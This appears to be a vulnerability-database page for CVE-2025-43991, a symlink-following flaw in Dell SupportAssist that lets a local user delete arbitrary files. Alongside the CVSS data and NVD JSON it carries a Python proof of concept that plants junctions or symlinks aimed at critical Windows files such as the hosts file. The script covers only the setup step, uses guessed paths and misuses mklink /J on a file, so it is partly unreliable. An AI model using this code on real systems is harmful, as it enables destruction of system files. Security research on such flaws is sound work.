Security Vulnerability Report
中文
CVE-2025-43991 CVSS 6.3 MEDIUM

CVE-2025-43991

Published: 2025-10-13 15:16:04
Last Modified: 2025-11-04 15:24:24
Source: [email protected]

Description

SupportAssist for Home PCs versions 4.8.2 and prior and SupportAssist for Business PCs versions 4.5.3 and prior, contain an UNIX Symbolic Link (Symlink) following vulnerability. A low privileged attacker with local access to the system could potentially exploit this vulnerability to delete arbitrary files only in that affected system.

CVSS Details

CVSS Score
6.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:dell:supportassist_for_business_pcs:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:dell:supportassist_for_home_pcs:*:*:*:*:*:*:*:* - VULNERABLE
Dell SupportAssist for Home PCs <= 4.8.2
Dell SupportAssist for Business PCs <= 4.5.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2025-43991 - Dell SupportAssist Symlink Following Vulnerability PoC # This PoC demonstrates the concept of exploiting a symlink following vulnerability # in Dell SupportAssist to delete arbitrary files on the system. import os import sys import tempfile import ctypes import shutil def is_admin(): """Check if the current process has administrative privileges.""" try: return ctypes.windll.shell32.IsUserAnAdmin() != 0 except Exception: return False def create_malicious_symlink(target_file, link_location): """ Create a malicious symbolic link (or junction in Windows) that points to a target file we want to delete when SupportAssist performs cleanup. Note: On Windows, we use directory junctions (mklink /J) or CreateSymbolicLinkW API since native symlinks require admin + developer mode. """ try: # Remove existing link if present if os.path.exists(link_location) or os.path.islink(link_location): if os.path.isdir(link_location) and not os.path.islink(link_location): shutil.rmtree(link_location) else: os.remove(link_location) # On Windows, create a directory junction (requires no special privileges) if sys.platform == 'win32': # Use mklink /J for directory junction cmd = f'mklink /J "{link_location}" "{target_file}"' result = os.system(cmd) if result == 0: print(f"[+] Directory junction created: {link_location} -> {target_file}") return True else: print(f"[-] Failed to create junction. Error code: {result}") return False else: # On Unix-like systems, use os.symlink os.symlink(target_file, link_location) print(f"[+] Symbolic link created: {link_location} -> {target_file}") return True except Exception as e: print(f"[-] Error creating symlink: {e}") return False def exploit(): """ Main exploit function. Steps: 1. Identify SupportAssist's working/temp directories 2. Create a symlink pointing to a critical system file 3. Trigger SupportAssist cleanup operation 4. The targeted file gets deleted by the privileged SupportAssist process """ print("=" * 60) print("CVE-2025-43991 - Dell SupportAssist Symlink Following PoC") print("=" * 60) if not is_admin(): print("[!] Warning: Running without admin privileges.") print("[!] Some operations may fail. Run as admin for full effect.") # Common SupportAssist temp/working directories supportassist_dirs = [ os.path.join(tempfile.gettempdir(), 'SupportAssist'), os.path.join(tempfile.gettempdir(),'Dell', 'SupportAssist'), 'C:\\ProgramData\\Dell\\SupportAssist', 'C:\\ProgramData\\SupportAssist', os.path.expanduser('~\\AppData\\Local\\Dell\\SupportAssist'), ] # Target critical files that would cause system instability if deleted # (These are examples - actual targets depend on attacker's goals) target_files = [ 'C:\\Windows\\System32\\drivers\\etc\\hosts', 'C:\\ProgramData\\Dell\\SupportAssist\\logs\\supportassist.log', 'C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Dell\\SupportAssist\\temp_data.tmp', ] # Step 1: Find or create a writable directory where SupportAssist operates target_dir = None for sa_dir in supportassist_dirs: if os.path.exists(sa_dir): target_dir = sa_dir print(f"[+] Found SupportAssist directory: {target_dir}") break if target_dir is None: # Fallback: use temp directory target_dir = tempfile.mkdtemp(prefix='sa_exploit_') print(f"[*] SupportAssist dir not found, using: {target_dir}") # Step 2: Create malicious symlink pointing to target file target_file = target_files[0] # Use first target as example link_name = os.path.join(target_dir, 'cleanup_target.tmp') print(f"\n[*] Target file to delete: {target_file}") print(f"[*] Symlink location: {link_name}") if create_malicious_symlink(target_file, link_name): print("\n[+] Symlink successfully planted!") print("[*] Waiting for SupportAssist cleanup operation...") print("[*] When SupportAssist deletes 'cleanup_target.tmp',") print("[*] it will follow the symlink and delete the target file instead.") print("\n[!] NOTE: This PoC only demonstrates the setup phase.") print("[!] Actual exploitation requires triggering SupportAssist") print("[!] to perform a cleanup operation on the planted symlink.") else: print("[-] Failed to plant symlink. Exploit aborted.") if __name__ == '__main__': exploit()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-43991", "sourceIdentifier": "[email protected]", "published": "2025-10-13T15:16:04.267", "lastModified": "2025-11-04T15:24:24.407", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "SupportAssist for Home PCs versions 4.8.2 and prior and SupportAssist for Business PCs versions 4.5.3 and prior, contain an UNIX Symbolic Link (Symlink) following vulnerability. A low privileged attacker with local access to the system could potentially exploit this vulnerability to delete arbitrary files only in that affected system."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.0, "impactScore": 5.2}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-61"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:dell:supportassist_for_business_pcs:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.5.3.25254", "matchCriteriaId": "9831B6C9-0619-4B5A-9985-9DA11E36E9C8"}, {"vulnerable": true, "criteria": "cpe:2.3:a:dell:supportassist_for_home_pcs:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.8.2.29006", "matchCriteriaId": "6BD98898-301B-460B-9A13-3F6C904CF98C"}]}]}], "references": [{"url": "https://www.dell.com/support/kbdoc/en-us/000378367/dsa-2025-362-security-update-for-dell-supportassist-for-home-pcs-and-dell-supportassist-for-business-pcs-vulnerabilities", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.